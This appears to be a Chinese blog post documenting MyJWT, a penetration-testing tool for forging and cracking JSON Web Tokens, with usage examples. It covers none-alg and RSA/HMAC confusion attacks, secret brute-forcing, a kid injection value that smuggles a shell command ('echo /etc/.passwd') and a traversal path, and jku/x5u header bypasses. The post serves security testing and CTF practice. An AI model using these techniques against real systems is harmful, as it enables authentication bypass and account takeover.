如何使用MyJWT对JSON Web Token(JWT)进行破解和漏洞测试

  • A+
所属分类:未分类

MyJWT

MyJWT是一款功能强大的命令行工具,MyJWT专为渗透测试人员、CTF参赛人员和编程开发人员设计,可以帮助我们对JSON Web Token(JWT)进行修改、签名、注入、破解和安全测试等等。

功能介绍

将新的JWT拷贝至剪贴板;

用户接口;

带颜色高亮输出;

修改JWT(Header/Payload);

安全性高;

RSA/HMAC混淆;

使用密钥对JWT进行签名;

通过暴力破解以猜测密钥;

使用正则表达式破解JWT并猜测密钥;

Kid注入;

Jku绕过;

X5u绕过;

MyJWT安装

在安装MyJWT时,广大研究人员可以直接使用pip来安装:

pip install myjwt

如需在一个Docker镜像中运行MyJWT,运行下列命令即可:

docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

 

# 加载托管字典的卷

docker run -v $(pwd)/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

# 在Windows下

docker run -v %CD%/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

如果想要自行下载源码并完成MyJWT,广大研究人员可以使用git命令将该项目源码克隆至本地并完成安装:

git clone https://github.com/mBouamama/MyJWT.git

cd ./MyJWT

pip install -r requirements.txt

python MyJWT/myjwt_cli.py --help

如需在BlackArch上安装并运行MyJWT,请运行下列命令:

pacman -S myjwt

工具使用

$ myjwt --help

Usage: myjwt [OPTIONS] JWT

 

  This cli is for pentesters, CTF players, or dev.

  You can modify your jwt, sign, inject ,etc...

  Full documentation is at http://myjwt.readthedocs.io.

  If you see problems or enhancement send an issue.I will respond as soon as possible.

  Enjoy :)

  All new jwt will be copy to the clipboard.

 

Options:

  --version                    Show the version and exit.

  --full-payload TEXT          New payload for your jwt.Json format Required.

  -h, --add-header TEXT        Add a new key, value to your jwt header, if key

                               is present old value will be replaced.Format:

                               key=value.

 

  -p, --add-payload TEXT       Add a new key, value to your jwt payload, if

                               key is present old value will be

                               replaced.Format: key=value.

 

  --sign TEXT                  Sign Your jwt with key given.

  --verify TEXT                verify your key.

  -none, --none-vulnerability  Check None Alg vulnerability.

  --hmac PATH                  Check RS/HMAC Alg vulnerability.

  --bruteforce PATH            Bruteforce to guess the secret used to sign the

                               token.

 

  -c, --crack TEXT             regex to iterate all string possibilities to

                               guess the secret used to sign the token.

 

  --kid TEXT                   Kid Injection sql

  --jku TEXT                   Jku Header to bypass authentication

  --x5u TEXT                   X5u Header to bypass authentication

  --crt TEXT                   For x5cHeader, force crt file

  --key TEXT                   For jku or x5c Header, force private key to

                               your key file

 

  --file TEXT                  For jku Header and x5u Header, force file name

  --print                      Print Decoded JWT

  -u, --url TEXT               Url to send your jwt.

  -m, --method TEXT            Method use for send request to url.(Default

                               GET).

 

  -d, --data TEXT              Data send to your url.Format: key=value. if

                               value = MY_JWT value will be replace by new

                               jwt.

 

  -c, --cookies TEXT           Cookies to send to your url.Format: key=value.

                               if value = MY_JWT value will be replace by new

                               jwt.

 

  --help                       Show this message and exit.

修改JWT

选项

类型

样例

帮助

--ful-payload

JSON

{"user": "admin"}

针对JWT的新Payload。

-h, --add-header

key=value

user=admin

向JWT Header中添加一个新密钥和值,如果密钥已存在,则会替换旧的密钥值。

-p, --add-payload

key=value

user=admin

向JWT Payload添加一个新的密钥和值,如果密钥已存在,则会替换旧的密钥值。

检查JWT

选项

类型

样例

帮助

--sign

text

mysecretkey

使用密钥签名JWT。

--verify

text

mysecretkey

验证密钥。

攻击测试

选项

类型

样例

帮助

-none, --none-vulnerability

Nothing

检测None Alg漏洞。

--hmac

PATH

./public.pem

检测RS/HMAC Alg漏洞,并使用公钥签名JWT。

--bruteforce

PATH

./wordlist/big.txt

暴力破解用于签名令牌的密钥,使用txt字典文件。

--crack

REGEX

"[a-z]{4}"

利用者则表达式枚举所有可能的字符串,并爆破用于签名令牌的密钥。

--kid

text

"00; echo /etc/.passwd"

Kid注入SQL。

--jku

text

MYPUBLICIP

Jku Header绕过认证。

--x5u

text

MYPUBLICIP

X5u绕过。

发送JWT

选项

类型

样例

帮助

-u, --url

url

http://challenge01.root-me.org/web-serveur/ch59/admin

发送JWT的URL地址。

-m, --method

text

POST

指定发送JWT所使用的请求方法。(默认为GET)

-d, --data

key=value

secret=MY_JWT

数据格式:key=value

-c, --cookies

key=value

secret=MY_JWT

Cookies格式:key=value

其他

选项

类型

样例

帮助

--crt

PATH

./public.crt

针对x5cHeader,,爆破证书文件。

--key

PATH

./private.pem

针对jku或x5c Header,指定密钥。

--file

text

myfile

针对jku Heade,指定非.json后缀的文件名。

--print

Nothing

输出解码的JWT。

--help

Nothing

显示帮助信息并退出。

--version

Nothing

显示Myjwt版本。

工具使用样例

修改JWT

命令行接口:

myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"

代码:

from myjwt.modify_jwt import add_header, change_payload

from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt

 

jwt_json = jwt_to_json(jwt)

jwt_json = add_header(jwt_json, {"kid": "001"})

jwt_json = change_payload(jwt_json, {"username": "admin"})

jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

完整样例:【点我查看

None-Vulnerability

命令行接口:

myjwt YOUR_JWT --none-vulnerability

代码:

from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt

from myjwt.vulnerabilities import none_vulnerability

jwt_json = jwt_to_json(jwt)

jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])

完整样例:【点我查看

签名密钥

命令行接口:

myjwt YOUR_JWT --sign YOUR_KEY

代码:

from myjwt.modify_jwt import signature

from myjwt.utils import jwt_to_json

key = "test"

jwt = signature(jwt_to_json(jwt), key)

完整样例:【点我查看

暴力破解

命令行接口:

myjwt YOUR_JWT --bruteforce PATH

代码:

from myjwt.vulnerabilities import bruteforce_wordlist

wordlist = "../../wordlist/common_pass.txt"

key = bruteforce_wordlist(jwt, wordlist)

完整样例:【点我查看

JWT破解

命令行接口:

myjwt YOUR_JWT --crack REGEX

RSA/HMAC混淆

命令行接口:

myjwt YOUR_JWT --hmac FILE

代码:

from myjwt.vulnerabilities import confusion_rsa_hmac

file = "public.pem"

jwt = confusion_rsa_hmac(jwt, file)

完整样例:【点我查看

Kid注入

命令行接口:

myjwt YOUR_JWT --kid INJECTION

代码:

from myjwt.modify_jwt import signature

from myjwt.utils import jwt_to_json

from myjwt.vulnerabilities import inject_sql_kid

 

injection = "../../../../../../dev/null"

sign = ""

jwt = inject_sql_kid(jwt, injection)

jwt = signature(jwt_to_json(jwt), sign)

完整样例:【点我查看

发送JWT

命令行接口:

myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"

Jku漏洞

命令行接口:

myjwt YOUR_JWT --jku YOUR_URL

代码:

from myjwt.vulnerabilities import jku_vulnerability

new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")

print(jwt)

完整样例:【点我查看

X5U漏洞

命令行接口:

myjwt YOUR_JWT --x5u YOUR_URL

代码:

from myjwt.vulnerabilities import x5u_vulnerability

newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")

print(jwt)

完整样例:【点我查看

项目地址

MyJWT:【GitHub传送门

参考文档

http://myjwt.readthedocs.io/

https://github.com/mBouamama/MyJWT/releases/latest

本文作者:Alpha_h4ck, 转载请注明来自FreeBuf.COM

# 安全分析 # JWT # Json Web Token

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: